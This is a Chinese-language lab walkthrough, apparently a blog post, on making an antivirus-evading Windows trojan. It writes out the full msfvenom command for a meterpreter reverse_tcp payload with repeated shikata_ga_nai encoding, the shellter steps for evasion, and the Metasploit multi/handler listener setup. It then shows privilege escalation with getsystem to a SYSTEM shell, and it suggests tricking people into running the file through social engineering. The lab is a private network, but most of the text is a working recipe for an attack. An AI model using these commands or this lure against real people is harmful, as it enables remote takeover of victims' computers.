原理
利用msf模塊中的msfvenom模塊,首先生成.exe木馬文件,用靶機打開,攻擊成功後,就滲透到了靶機系統中。
準備
win7靶機 ip :192.168.56.130
kali攻擊機 ip: 192.168.56.135
##實戰開始
1.打開kali機,在命令行輸入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exe
LHOST
是主機的ip,用來“提醒”木馬成功後應該返回信息給自己的主機。
lport
是返回時連接的端口號,需要開啓tcp功能,1234端口好像默認開啓?
>
後面的那一串表示木馬生成的對應地址,爲了方便操作我直接生成在桌面上。
-e x86/shikata_ga_nai
爲使用shikata_ga_nai的編碼方式對攻擊載荷進行重新編碼
-i 5
爲使用剛纔設定的編碼方式對目標進行5次編碼
2.命令行輸入
shellter
第一個選項選擇A
3.PE Target 後面填寫/home/kali/Desktop/1.exe
,即木馬所在路徑。
然後等待一段時間······
注意,雖然看着不動,但是上面那個數字一直在跳,所以不是你卡住了~
4.然後選擇Y
5.選擇L,payload index 選擇1
6.設置LHOST以及LPORT
等個大概2秒鐘,就結束了~
免殺木馬製作完成。
命令行輸入
msfconsole
進入metasploit。
然後輸入
use exploit/multi/handler
開啓監聽模式
接下來就是設置參數了,可以使用option
命令來查看需要設置的參數。主要設置三個:payload、LHOST、LPORT,需要跟木馬一樣,複製一下就行
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.135
set lport 1234
這裏大小寫隨意,都可以被識別。
隨後輸入
exploit
執行監聽命令,也就是攻擊開始~
kali端操作結束!
然後利用社會工程學等方式誘騙其他人點擊這玩意,就被攻擊了。
現在假裝win7被騙了,無意中點了我的反彈木馬:
然後輸入
shell
就可以獲取對方管理員權限。
在輸入shell之前,輸入getsystem,獲得system權限以後,再輸入shell就可以獲得最高權限啦~
使用echo %username%
可以輸出使用者的名字,這裏是SJX-PC$
,如果是管理員的話,只會顯示管理員賬號(我這裏是“sjx”),而且,看前面的內容也可以知道是system權限: